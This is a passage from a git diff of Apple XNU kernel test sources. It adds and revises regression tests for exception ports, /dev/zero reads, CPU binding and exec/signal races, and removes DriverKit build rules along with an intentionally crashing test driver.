&bound_cpu_out, &bound_cpu_out_size, NULL, 0); - printf("cpu %2d: %d\n", i, g_cpu_seen[i]); - } + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu"); + T_QUIET; T_ASSERT_EQ(bound_cpu_out, -1, "thread should be unbound at the end"); - T_ASSERT_EQ(cpus_seen, g_threads, "test should have run threads on all CPUS"); + T_PASS("test has run threads on all CPUS"); } diff --git a/tests/data_protection.c b/tests/data_protection.c index bb0411dec..2688bdde4 100644 --- a/tests/data_protection.c +++ b/tests/data_protection.c @@ -1040,7 +1040,7 @@ apple_key_store(uint32_t command, 
input_struct_count, outputs, output_count, NULL, NULL ); if (io_result != kIOReturnSuccess) { - T_LOG("%s: call to AppleKeyStore method %d failed", __func__); + T_LOG("%s: call to AppleKeyStore method %d failed", __func__, command); goto close; } diff --git a/tests/decompression_failure.c b/tests/decompression_failure.c index 1e753f7f1..6005152eb 100644 --- a/tests/decompression_failure.c +++ b/tests/decompression_failure.c @@ -120,6 +120,8 @@ run_test(vm_address_t buffer_start, vm_address_t buffer_length) static size_t kern_memory_failure_handler( + __unused mach_port_t task, + __unused mach_port_t thread, exception_type_t exception, mach_exception_data_t code) { diff --git a/tests/dev_zero.c b/tests/dev_zero.c new file mode 100644 index 000000000..c35549957 --- /dev/null +++ b/tests/dev_zero.c @@ -0,0 +1,29 @@ +#include +#include +#include +#include +#include + +T_DECL(dev_zero, + "test reading from /dev/zero", + T_META_ASROOT(false)) +{ + int dev = opendev("/dev/zero", O_RDONLY, NULL, NULL); + char buffer[100]; + + for (int i = 0; i < 100; i++) { + buffer[i] = 0xff; + } + + int rd_sz = read(dev, buffer, sizeof(buffer)); + + T_EXPECT_EQ(rd_sz, 100, "read from /dev/zero failed"); + + for (int i = 0; i < 100; i++) { + if (buffer[i]) { + T_FAIL("Unexpected non-zero character read from /dev/zero"); + } + } + + close(dev); +} diff --git a/tests/driverkit/Makefile b/tests/driverkit/Makefile index f58ffbd84..987e08d57 100644 --- a/tests/driverkit/Makefile +++ b/tests/driverkit/Makefile @@ -1,100 +1,11 @@ -PROJECT := xnu/darwintests - ifdef BASEDSTROOT override DSTROOT = $(BASEDSTROOT) endif -INVALID_ARCHS = i386 -ENABLE_LTE_TESTS=YES - -OTHER_LTE_INCLUDE_FILES += \ - /System/Library/PrivateFrameworks/LoggingSupport.framework, \ - /System/Library/PrivateFrameworks/MobileKeyBag.framework, \ - /System/Library/Frameworks/IOSurface.framework, \ - /usr/local/lib/libdarwintest_utils.dylib, \ - /usr/lib/libapple_crypto.dylib, - -DEVELOPER_DIR ?= $(shell xcode-select -p) # the 
xnu build system will only ever call us with the default target .DEFAULT_GOAL := install -SDKROOT ?= driverkit.internal - -include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.common - -DRIVERKIT_DIR := $(TARGETSDK)/System/DriverKit -DRIVERKIT_TARGET := x86_64-apple-driverkit$(shell xcrun --sdk driverkit.internal --show-sdk-version) - -IIG := $(shell xcrun --sdk "$(SDKROOT)" -f iig) - -# Enumerate all directories in this folder, excluding the "build" directory -DEXT_SRCS = $(filter-out build,$(shell find . -type d -depth 1 | sed -e "s:./::g")) - -# hack: reuse the default CXXFLAGS and LDFLAGS but remove -mmacosx-version-min and -arch. Also adds a few other required flags -# These are used for both iig and clang -DEXT_SHARED_CXXFLAGS := $(filter-out -mmacosx-version-min=%, $(shell echo $(CXXFLAGS) $(OTHER_CXXFLAGS) | sed -e "s/-arch [a-zA-Z0-9_]*//g")) -isystem$(DRIVERKIT_DIR)/usr/include -iframework$(DRIVERKIT_DIR)/System/Library/Frameworks -std=gnu++14 - -# These are used just for clang -DEXT_CXXFLAGS := $(DEXT_SHARED_CXXFLAGS) -target $(DRIVERKIT_TARGET) - -# These are used just for iig -IIGFLAGS := -- $(DEXT_SHARED_CXXFLAGS) -D__IIG=1 -x c++ - -# Used just for clang. 
LDFLAGS are not needed for iig -DEXT_LDFLAGS := $(filter-out -mmacosx-version-min=%, $(shell echo $(LDFLAGS) $(OTHER_LDFLAGS) | sed -e "s/-arch [a-zA-Z0-9_]*//g")) -target $(DRIVERKIT_TARGET) -L$(DRIVERKIT_DIR)/usr/lib -F$(DRIVERKIT_DIR)/System/Library/Frameworks -framework DriverKit +install: + mkdir -p $(DSTROOT)/AppleInternal -# This generates rules to create dexts from each directory specified in DEXT_SRCS -define GENERATE_DEXT_RULE -## Given the following directory structure: -## test_driver_123/ -## Info.plist -## test_driver_123.entitlements -## [cpp and iig files] -## This produces a dext called com.apple.test_driver_123.dext: -## com.apple.test_driver_123.dext/ -## com.apple.test_driver_123 [dext executable] -## Info.plist -## _CodeSignature/ - -CUSTOM_TARGETS += com.apple.$1.dext - -com.apple.$1.dext : $(patsubst $1/%.cpp,$(OBJROOT)/$1/%.o,$(wildcard $1/*.cpp)) $(patsubst $1/%.iig,$(OBJROOT)/$1/DerivedSources/%.iig.o,$(wildcard $1/*.iig)) - # Create bundle directory - mkdir -p $(SYMROOT)/$$@ - # Link object files - $(CXX) $(DEXT_LDFLAGS) $$^ -o $(SYMROOT)/$$@/com.apple.$1 - # Copy Info.plist and sign - cp $1/Info.plist $(SYMROOT)/$$@ - codesign -vvv --force --sign - --entitlements $1/$1.entitlements --timestamp=none $(SYMROOT)/$$@ - -install-com.apple.$1.dext: com.apple.$1.dext - mkdir -p $(INSTALLDIR) - cp -R $(SYMROOT)/com.apple.$1.dext $(INSTALLDIR) - -$(OBJROOT)/$1/DerivedSources/%.iig.o: $(OBJROOT)/$1/DerivedSources/%.iig.cpp - mkdir -p $(OBJROOT)/$1/DerivedSources - # Compile *.iig.cpp to object file - $(CXX) $(DEXT_CXXFLAGS) -I$1/ -I$(OBJROOT)/$1/DerivedSources -c $$^ -o $$@ - -$(OBJROOT)/$1/DerivedSources/%.iig.cpp: $1/%.iig - mkdir -p $(OBJROOT)/$1/DerivedSources - # Generate *.iig.cpp and *.h header files from *.iig - $(IIG) --def $$^ --impl $$@ --header $$(patsubst %.iig.cpp,%.h,$$@) $(IIGFLAGS) - -# Tell make not to delete the intermediate *.iig.cpp file since it is useful for debugging -.PRECIOUS :: $(OBJROOT)/$1/DerivedSources/%.iig.cpp - 
-$(OBJROOT)/$1/%.o: $1/%.cpp $(patsubst $1/%.iig,$(OBJROOT)/$1/DerivedSources/%.iig.o,$(wildcard $1/*.iig)) - # Compile c++ file. The additional dependency is for headers emitted by iig - $(CXX) $(DEXT_CXXFLAGS) -I$1/ -I$(OBJROOT)/$1/DerivedSources -c $$< -o $$@ -endef - - -ifeq ($(PLATFORM),MacOSX) -$(foreach DEXTSRCDIR,$(DEXT_SRCS),$(eval $(call GENERATE_DEXT_RULE,$(DEXTSRCDIR)))) -else -EXCLUDED_SOURCES += $(DEXT_SRCS) -endif - -include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.targets diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist b/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist deleted file mode 100644 index d4a53465d..000000000 --- a/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist +++ /dev/null @@ -1,70 +0,0 @@ - - - - - BuildMachineOSBuild - 19A582a - CFBundleDevelopmentRegion - en - CFBundleExecutable - com.apple.test_intentionally_crashing_driver_56101852 - CFBundleIdentifier - com.apple.test_intentionally_crashing_driver_56101852 - CFBundleInfoDictionaryVersion - 6.0 - CFBundleName - com.apple.test_intentionally_crashing_driver_56101852 - CFBundlePackageType - DEXT - CFBundleShortVersionString - 1.0 - CFBundleSupportedPlatforms - - MacOSX - - CFBundleVersion - 1 - DTCompiler - com.apple.compilers.llvm.clang.1_0 - DTPlatformBuild - 12A5026a - DTPlatformName - macosx - DTPlatformVersion - 10.16 - DTSDKBuild - - DTSDKName - driverkit.macosx20.0 - DTXcode - 1200 - DTXcodeBuild - 12A5026a - IOKitPersonalities - - test_intentionally_crashing_driver_56101852 - - CFBundleIdentifier - com.apple.test_intentionally_crashing_driver_56101852 - CFBundleIdentifierKernel - com.apple.kpi.iokit - IOClass - IOUserService - IOMatchCategory - com.apple.test_intentionally_crashing_driver_56101852 - IOProviderClass - IOUserResources - IOResourceMatch - IOKit - IOUserClass - test_intentionally_crashing_driver_56101852 - IOUserServerName - 
com.apple.test_intentionally_crashing_driver_56101852 - - - OSBundleUsageDescription - - OSMinimumDriverKitVersion - 20.0 - - diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp deleted file mode 100644 index 96e21dc20..000000000 --- a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp +++ /dev/null @@ -1,30 +0,0 @@ -// -// test_intentionally_crashing_driver_56101852.cpp -// test_intentionally_crashing_driver_56101852 -// -// Copyright © 2019 Apple Inc. All rights reserved. -// - -#include - -#include -#include - -#include "test_intentionally_crashing_driver_56101852.h" - -kern_return_t -IMPL(test_intentionally_crashing_driver_56101852, Start) -{ - kern_return_t ret; - ret = Start(provider, SUPERDISPATCH); - os_log(OS_LOG_DEFAULT, "Hello World"); - return ret; -} - -/* Intentionally crash */ -__attribute__((constructor)) void -crash() -{ - /* cause SIGILL */ - __builtin_trap(); -} diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements deleted file mode 100644 index a34733c79..000000000 --- a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements +++ /dev/null @@ -1,10 +0,0 @@ - - - - - com.apple.developer.driverkit - - com.apple.security.app-sandbox - - - diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig deleted file mode 100644 index 1ebf4fbe8..000000000 --- 
a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig +++ /dev/null @@ -1,21 +0,0 @@ -// -// test_intentionally_crashing_driver_56101852.iig -// test_intentionally_crashing_driver_56101852 -// -// Copyright © 2019 Apple Inc. All rights reserved. -// - -#ifndef test_intentionally_crashing_driver_56101852_h -#define test_intentionally_crashing_driver_56101852_h - -#include -#include - -class test_intentionally_crashing_driver_56101852: public IOService -{ -public: - virtual kern_return_t - Start(IOService * provider) override; -}; - -#endif /* test_intentionally_crashing_driver_56101852_h */ diff --git a/tests/drop_priv.c b/tests/drop_priv.c index 13d4681af..f91df015f 100644 --- a/tests/drop_priv.c +++ b/tests/drop_priv.c @@ -14,6 +14,8 @@ #include #endif +#include "drop_priv.h" + #if TARGET_OS_OSX #define INVOKER_UID "SUDO_UID" #define INVOKER_GID "SUDO_GID" @@ -40,8 +42,6 @@ _get_sudo_invoker(const char *var) } #endif /* TARGET_OS_OSX */ -void -drop_priv(void); void drop_priv(void) { diff --git a/tests/drop_priv.h b/tests/drop_priv.h new file mode 100644 index 000000000..864da8369 --- /dev/null +++ b/tests/drop_priv.h @@ -0,0 +1,6 @@ +#ifndef __DROP_PRIV_H +#define __DROP_PRIV_H + +void drop_priv(void); + +#endif /* __DROP_PRIV_H */ diff --git a/tests/exc_helpers.c b/tests/exc_helpers.c index 6084fef4b..83567dcf1 100644 --- a/tests/exc_helpers.c +++ b/tests/exc_helpers.c @@ -105,14 +105,36 @@ catch_mach_exception_raise( __builtin_unreachable(); } +/** + * This has to be defined for linking purposes, but it's unused. 
+ */ +kern_return_t +catch_mach_exception_raise_state( + mach_port_t exception_port, + exception_type_t type, + exception_data_t codes, + mach_msg_type_number_t code_count, + int *flavor, + thread_state_t in_state, + mach_msg_type_number_t in_state_count, + thread_state_t out_state, + mach_msg_type_number_t *out_state_count) +{ +#pragma unused(exception_port, type, codes, code_count, flavor, in_state, in_state_count, out_state, out_state_count) + T_FAIL("Triggered catch_mach_exception_raise_state() which shouldn't happen..."); + __builtin_unreachable(); +} + /** * Called by mach_exc_server() to handle the exception. This will call the * test's exception-handler callback and will then modify * the thread state to move to the next instruction. */ kern_return_t -catch_mach_exception_raise_state( +catch_mach_exception_raise_state_identity( mach_port_t exception_port __unused, + mach_port_t thread, + mach_port_t task, exception_type_t type, exception_data_t codes, mach_msg_type_number_t code_count, @@ -138,7 +160,7 @@ catch_mach_exception_raise_state( T_ASSERT_EQ(*flavor, EXCEPTION_THREAD_STATE, "The thread state flavor is EXCEPTION_THREAD_STATE"); T_ASSERT_EQ(in_state_count, EXCEPTION_THREAD_STATE_COUNT, "The thread state count is EXCEPTION_THREAD_STATE_COUNT"); - size_t advance_pc = exc_handler_callback(type, codes_64); + size_t advance_pc = exc_handler_callback(task, thread, type, codes_64); /** * Increment the PC by the requested amount so the thread doesn't cause @@ -155,6 +177,7 @@ catch_mach_exception_raise_state( pc = ptrauth_sign_unauthenticated(pc, ptrauth_key_function_pointer, 0); arm_thread_state64_set_pc_fptr(*state, pc); #else + (void)advance_pc; T_FAIL("catch_mach_exception_raise_state() not fully implemented on this architecture"); __builtin_unreachable(); #endif @@ -163,28 +186,6 @@ catch_mach_exception_raise_state( return KERN_SUCCESS; } -/** - * This has to be defined for linking purposes, but it's unused. 
- */ -kern_return_t -catch_mach_exception_raise_state_identity( - mach_port_t exception_port, - mach_port_t thread, - mach_port_t task, - exception_type_t type, - exception_data_t codes, - mach_msg_type_number_t code_count, - int *flavor, - thread_state_t in_state, - mach_msg_type_number_t in_state_count, - thread_state_t out_state, - mach_msg_type_number_t *out_state_count) -{ -#pragma unused(exception_port, thread, task, type, codes, code_count, flavor, in_state, in_state_count, out_state, out_state_count) - T_FAIL("Triggered catch_mach_exception_raise_state_identity() which shouldn't happen..."); - __builtin_unreachable(); -} - mach_port_t create_exception_port(exception_mask_t exception_mask) { @@ -209,7 +210,7 @@ create_exception_port(exception_mask_t exception_mask) thread, exception_mask, exc_port, - (exception_behavior_t)(EXCEPTION_STATE | MACH_EXCEPTION_CODES), + (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES), EXCEPTION_THREAD_STATE); T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler"); diff --git a/tests/exc_helpers.h b/tests/exc_helpers.h index 2ac27c8ad..60237d5da 100644 --- a/tests/exc_helpers.h +++ b/tests/exc_helpers.h @@ -37,14 +37,17 @@ * Callback invoked by run_exception_handler() when a Mach exception is * received. 
* - * @param type exception type received from the kernel - * @param codes exception codes received from the kernel + * @param task the task causing the exception + * @param thread the thread causing the exception + * @param type exception type received from the kernel + * @param codes exception codes received from the kernel * * @return how much the exception handler should advance the program * counter, in bytes (in order to move past the code causing the * exception) */ -typedef size_t (*exc_handler_callback_t)(exception_type_t type, mach_exception_data_t codes); +typedef size_t (*exc_handler_callback_t)(mach_port_t task, mach_port_t thread, + exception_type_t type, mach_exception_data_t codes); mach_port_t create_exception_port(exception_mask_t exception_mask); diff --git a/tests/exception_ports_info.c b/tests/exception_ports_info.c new file mode 100644 index 000000000..e27ba5643 --- /dev/null +++ b/tests/exception_ports_info.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(true)); + +T_DECL(exception_ports_info, "Test {task, thread}_get_exception_ports_info") +{ + kern_return_t kr; + mach_port_t exc_port1, exc_port2, exc_port3; + + mach_msg_type_number_t count = EXC_TYPES_COUNT; + exception_mask_t masks[EXC_TYPES_COUNT]; + ipc_info_port_t ports_info[EXC_TYPES_COUNT]; + exception_behavior_t behaviors[EXC_TYPES_COUNT]; + thread_state_flavor_t flavors[EXC_TYPES_COUNT]; + + mach_msg_type_number_t count2 = EXC_TYPES_COUNT; + exception_mask_t masks2[EXC_TYPES_COUNT]; + mach_port_t ports[EXC_TYPES_COUNT]; + exception_behavior_t behaviors2[EXC_TYPES_COUNT]; + thread_state_flavor_t flavors2[EXC_TYPES_COUNT]; + + unsigned int exc_port1_kotype = 0, exc_port1_kaddr = 0; + unsigned int exc_port2_kotype = 0, exc_port2_kaddr = 0; + unsigned int kotype = 0, kobject = 0, exc_port3_kotype = 0, exc_port3_kaddr = 0; + boolean_t found_exc_port1 = false; + boolean_t
found_exc_port2 = false; + boolean_t found_exc_port3 = false; + + ipc_info_space_t info_space; + ipc_info_name_array_t table; + ipc_info_tree_name_array_t tree; + mach_msg_type_number_t tblcnt = 0, treecnt = 0; + + /* Create the mach port the exception messages will be sent to. */ + kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port1); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port"); + kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port2); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port"); + kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port3); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port"); + + /* + * Insert a send right into the exception port that the kernel will use to + * send the exception thread the exception messages. + */ + kr = mach_port_insert_right(mach_task_self(), exc_port1, exc_port1, MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port"); + kr = mach_port_insert_right(mach_task_self(), exc_port2, exc_port2, MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port"); + kr = mach_port_insert_right(mach_task_self(), exc_port3, exc_port3, MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port"); + + T_LOG("exc_port1: 0x%x", exc_port1); + T_LOG("exc_port2: 0x%x", exc_port2); + T_LOG("exc_port3: 0x%x", exc_port3); + + /* Tell the kernel what port to send exceptions to. 
*/ + kr = task_set_exception_ports( + mach_task_self(), + EXC_MASK_GUARD, + exc_port1, + (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES), + THREAD_STATE_NONE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler"); + + kr = task_set_exception_ports( + mach_task_self(), + EXC_MASK_RPC_ALERT, /* why can't be EXC_CRASH or EXC_MASK_CORPSE_NOTIFY ? */ + exc_port2, + (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES), + THREAD_STATE_NONE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler"); + + kr = task_set_exception_ports( + mach_task_self(), + EXC_MASK_RESOURCE | EXC_MASK_BREAKPOINT | EXC_MASK_SYSCALL, + exc_port3, + (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES), + THREAD_STATE_NONE); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler"); + + /* now, get exception ports info */ + kr = thread_get_exception_ports(mach_thread_self(), EXC_MASK_ALL, masks2, &count2, ports, behaviors2, flavors2); + T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports(): 0x%x", kr); + T_EXPECT_EQ(count2, 0, "should have 0 exception ports"); + + kr = thread_get_exception_ports_info(mach_thread_self(), EXC_MASK_ALL, masks, &count, ports_info, behaviors, flavors); + T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports_info(): 0x%x", kr); + T_EXPECT_EQ(count, 0, "should have 0 exception ports"); + + count = EXC_TYPES_COUNT; + count2 = EXC_TYPES_COUNT; + + kr = task_get_exception_ports_info(mach_task_self(), EXC_MASK_ALL, masks, &count, ports_info, behaviors, flavors); + T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports_info(): 0x%x", kr); + T_EXPECT_EQ(count, 4, "should have 4 masks"); /* Returns 3 if one exc_port registers for EXC_CRASH */ + + /* get exception ports */ + kr = task_get_exception_ports(mach_task_self(), EXC_MASK_ALL, masks2, &count2, ports, behaviors2, flavors2); + T_EXPECT_MACH_SUCCESS(kr, 
"task_get_exception_ports(): 0x%x", kr); + + for (int i = 0; i < count2; i++) { + T_LOG("exception port name: 0x%x", ports[i]); + } + T_EXPECT_EQ(count, count2, "should return same mask count"); + + kr = memcmp(masks, masks2, count * sizeof(exception_mask_t)); + T_EXPECT_EQ(kr, 0, "masks should be the same"); + + kr = memcmp(behaviors, behaviors2, count * sizeof(exception_behavior_t)); + T_EXPECT_EQ(kr, 0, "behaviors should be the same"); + + kr = memcmp(flavors, flavors2, count * sizeof(thread_state_flavor_t)); + T_EXPECT_EQ(kr, 0, "flavors should be the same"); + + kr = mach_port_kernel_object(mach_task_self(), mach_task_self(), &kotype, &kobject); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_kernel_object(): 0x%x", kr); + T_LOG("task_self kobject: 0x%x", kobject); + + T_QUIET; T_EXPECT_MACH_SUCCESS(mach_port_space_info(mach_task_self(), &info_space, &table, + &tblcnt, &tree, &treecnt), "mach_port_space_info(): 0x%x", kr); + + for (int i = 0; i < tblcnt; i++) { + if (table[i].iin_name == exc_port1) { + exc_port1_kaddr = table[i].iin_object; + } + if (table[i].iin_name == exc_port2) { + exc_port2_kaddr = table[i].iin_object; + } + if (table[i].iin_name == exc_port3) { + exc_port3_kaddr = table[i].iin_object; + } + } + + T_LOG("exc_port_1_kaddr: 0x%x", exc_port1_kaddr); + T_LOG("exc_port_2_kaddr: 0x%x", exc_port2_kaddr); + T_LOG("exc_port_3_kaddr: 0x%x", exc_port3_kaddr); + + for (int i = 0; i < count; i++) { + T_LOG("ports_info[%d].iip_port_object: 0x%x", i, ports_info[i].iip_port_object); + + if (ports_info[i].iip_port_object == exc_port1_kaddr) { + T_EXPECT_NE(ports_info[i].iip_port_object, 0, + "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object); + T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject, + "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object); + T_EXPECT_EQ(masks[i], EXC_MASK_GUARD, "check if mask for exc_port1 is correct"); + found_exc_port1 = true; + } + if
(ports_info[i].iip_port_object == exc_port2_kaddr) { + T_EXPECT_NE(ports_info[i].iip_port_object, 0, + "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object); + T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject, + "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object); + T_EXPECT_EQ(masks[i], EXC_MASK_RPC_ALERT, "check if mask for exc_port2 is correct"); + found_exc_port2 = true; + } + if (ports_info[i].iip_port_object == exc_port3_kaddr) { + T_EXPECT_NE(ports_info[i].iip_port_object, 0, + "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object); + T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject, + "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object); + T_EXPECT_EQ(masks[i], EXC_MASK_RESOURCE | EXC_MASK_BREAKPOINT | EXC_MASK_SYSCALL, "check if mask for exc_port3 is correct"); + found_exc_port3 = true; + } + } + + T_EXPECT_TRUE(found_exc_port1, "should find exc_port1"); + T_EXPECT_TRUE(found_exc_port2, "should find exc_port2"); + T_EXPECT_TRUE(found_exc_port3, "should find exc_port3"); +} diff --git a/tests/exception_tests.c b/tests/exception_tests.c new file mode 100644 index 000000000..37517e7f8 --- /dev/null +++ b/tests/exception_tests.c @@ -0,0 +1,51 @@ +#include +#include +#include +#include "exc_helpers.h" + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(true)); + +static size_t +exc_immovable_handler( + mach_port_t task, + mach_port_t thread, + __unused exception_type_t type, + __unused mach_exception_data_t codes) +{ + T_EXPECT_EQ(task, mach_task_self(), "Received immovable task port"); + T_EXPECT_EQ(thread, pthread_mach_thread_np(pthread_main_thread_np()), + "Received immovable thread port"); + T_END; +} + +T_DECL(exc_immovable, "Test that exceptions receive immovable ports") +{ + mach_port_t exc_port = create_exception_port(EXC_MASK_BAD_ACCESS); + uint32_t opts = 0; + size_t size = 
sizeof(opts); + mach_port_t mp; + kern_return_t kr; + + T_LOG("Check if task_exc_guard exception has been enabled\n"); + int ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0); + T_EXPECT_POSIX_SUCCESS(ret, "sysctlbyname(kern.ipc_control_port_options)"); + + if ((opts & 0x30) == 0) { + T_SKIP("immovable rights aren't enabled"); + } + + kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &mp); + T_EXPECT_MACH_SUCCESS(kr, "task_get_special_port"); + T_EXPECT_NE(mp, mach_task_self(), "should receive movable port"); + + /* + * do not deallocate the port we received on purpose to check + * that the exception will not coalesce with the movable port + * we have in our space now + */ + + run_exception_handler(exc_port, exc_immovable_handler); + *(void *volatile*)0 = 0; +} diff --git a/tests/exception_tests.entitlements b/tests/exception_tests.entitlements new file mode 100644 index 000000000..bfd52f6ae --- /dev/null +++ b/tests/exception_tests.entitlements @@ -0,0 +1,8 @@ + + + + + com.apple.security.get-movable-control-port + + + diff --git a/tests/exec-race-58566604.c b/tests/exec-race-58566604.c new file mode 100644 index 000000000..939daf047 --- /dev/null +++ b/tests/exec-race-58566604.c @@ -0,0 +1,171 @@ +#include +#include +#include +#include +#include +#include +#include +#include + +#include + +// rdar://58566604 +// Exercise races of signal delivery vs exec in multi-threaded processes + +T_GLOBAL_META(T_META_NAMESPACE("xnu.exec"), + T_META_CHECK_LEAKS(false), + T_META_ALL_VALID_ARCHS(true)); + +enum { KILL_ONCE, KILL_MANY, KILL_LAST } kill_mode; +enum { EXEC_FIRST, EXEC_SECOND, EXEC_LAST } exec_mode; + +static int fd[2]; + +static void +do_exec(void) +{ + char echo_arg[50] = ""; + + snprintf(echo_arg, sizeof(echo_arg), " Child[%d] says hello after exec", getpid()); + + char * new_argv[] = { + "/bin/echo", + echo_arg, + NULL + }; + + int ret = execv(new_argv[0], new_argv); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "execv()"); +} +
+static void* +thread_main(void* arg) +{ + T_LOG("mode: %d, %d: Child[%d] created second thread\n", + kill_mode, exec_mode, getpid()); + + if (exec_mode == EXEC_SECOND) { + int ret = dprintf(fd[1], "Hi!"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "dprintf()"); + do_exec(); + } + + while (1) { + } + return NULL; +} + +void +run_test(void) +{ + T_LOG("mode: %d, %d: Parent[%d]: forking\n", + kill_mode, exec_mode, getpid()); + + pid_t child_pid = fork(); + + T_QUIET; T_ASSERT_POSIX_SUCCESS(child_pid, "fork()"); + + int ret = 0; + + if (child_pid == 0) { + pthread_t thread; + ret = pthread_create(&thread, NULL, thread_main, NULL); + T_QUIET; T_ASSERT_POSIX_ZERO(ret, "pthread_create()"); + + if (exec_mode == EXEC_FIRST) { + ret = dprintf(fd[1], "Hi!"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "dprintf()"); + + do_exec(); + } + + while (1) { + } + } else { + char buffer[4] = ""; + ret = read(fd[0], buffer, sizeof(buffer)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "read()"); + + T_LOG("mode: %d, %d: Parent[%d]: got: '%s' from execing child, trying to kill and wait\n", + kill_mode, exec_mode, getpid(), buffer); + + int killcount = 0, status = 0, waitedpid = 0; + + switch (kill_mode) { + case KILL_ONCE: + ret = kill(child_pid, SIGKILL); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kill()"); + + waitedpid = waitpid(child_pid, &status, 0); + + T_QUIET; T_ASSERT_POSIX_SUCCESS(waitedpid, "waitpid()"); + + killcount++; + break; + case KILL_MANY: + while (waitedpid == 0) { + ret = kill(child_pid, SIGKILL); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kill()"); + + waitedpid = waitpid(child_pid, &status, WNOHANG); + T_QUIET; T_ASSERT_POSIX_SUCCESS(waitedpid, "waitpid()"); + + killcount++; + } + break; + default: + break; + } + + T_LOG("mode: %d, %d: Parent[%d]: waitpid returned: %d, errno %d (%s), exit signal %d, after %d loops\n", + kill_mode, exec_mode, getpid(), waitedpid, errno, strerror(errno), WTERMSIG(status), killcount); + } +} + +T_DECL(exec_exit_race_once_first, "Exec-exit race, one
kill, exec on first thread") { + int rv = pipe(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()"); + + kill_mode = KILL_ONCE; + exec_mode = EXEC_FIRST; + + for (int i = 0; i < 1000; i++) { + run_test(); + } +} + +T_DECL(exec_exit_race_many_first, "Exec-exit race, many kill, exec on first thread") { + int rv = pipe(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()"); + + kill_mode = KILL_MANY; + exec_mode = EXEC_FIRST; + + for (int i = 0; i < 1000; i++) { + run_test(); + } +} + +T_DECL(exec_exit_race_once_second, "Exec-exit race, one kill, exec on second thread") { + int rv = pipe(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()"); + + kill_mode = KILL_ONCE; + exec_mode = EXEC_SECOND; + + for (int i = 0; i < 1000; i++) { + run_test(); + } +} + +T_DECL(exec_exit_race_many_second, "Exec-exit race, many kill, exec on second thread") { + int rv = pipe(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()"); + + kill_mode = KILL_MANY; + exec_mode = EXEC_SECOND; + + for (int i = 0; i < 